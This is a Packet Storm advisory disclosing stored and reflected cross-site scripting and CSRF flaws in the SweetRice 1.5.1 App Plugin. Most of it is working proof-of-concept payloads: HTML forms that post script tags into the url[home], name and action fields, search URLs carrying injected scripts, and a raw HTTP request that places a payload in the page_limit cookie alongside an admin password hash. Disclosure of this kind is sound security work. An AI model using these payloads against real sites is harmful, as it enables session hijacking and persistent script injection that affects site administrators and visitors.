SweetRice 1.5.1 Cross Site Request Forgery / Cross Site Scripting

2016-11-07T00:00:00
ID PACKETSTORM:139590
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2016-11-07T00:00:00

Description

                                        
                                            `<!--  
Title: SweetRice App Plugin - Multiple XSS / CSRF  
Application: App Plugin  
Versions Affected: 1.0  
Vendor URL: http://www.basic-cms.org/  
Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip  
Discovered by: Ashiyane Digital Security Team  
Bugs: CSRF & XSS  
Date: 17-Sept-2016  
  
Proof of Concept :  
  
1. Stored Xss in Custom App URL:  
Vulnerable Parameter : url[home]  
-->  
<form method="post"   
action="http://localhost/as/?app_mode=links&plugin=App&type=plugin">  
<input type="text" name="url[home]"   
value='"><script>alert(1)</script>'>  
<input type="hidden" name="lids[home]" value="1">  
<input type="submit" value="Done">  
</form>  
<!--  
2. Xss in search:  
http://localhost/1/as/?type=plugin&plugin=App&app_mode=database&keyword="><script>alert(1)</script>  
  
3. Xss in Page Limit:  
Payload should inject in cookies.  
Vulnerable Parameter : page_limit  
Headers :  
  
GET /as/?app_mode=database&plugin=App&type=plugin& HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101   
Firefox/49.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/1/as/?app_mode=database&plugin=App&type=plugin&  
Cookie: dashboad_bg=#3f0840; page_limit="><script>alert(1)</script>;   
admin=admin; passwd=5f4dcc3b5aa765d61d8327deb882cf99; lang=en-us;   
__atuvc=15|41;   
grav-tabs-state={"tab-content.options.advanced":"data.content"};   
sweetrice=5h30gqavosudpnferatlh9oca4  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
  
4. Stored Xss and Csrf In Create Form:  
-->  
<form method="post"   
action="http://localhost/1/as/?type=plugin&plugin=App&app_mode=form&mode=insert">  
<input type="hidden" name="id" value="">  
<input type="hidden" id="name" name="name"   
value='<script>alert(1)</script>'>  
<input type="hidden" id="action" name="action"   
value='<script>alert(2)</script>'>  
<input type="submit" value="Done">  
</form>  
  
<!--  
5. Xss in Search:  
http://localhost/1/as/?type=plugin&plugin=App&app_mode=form&search="><script>alert(1)</script>  
-->  
`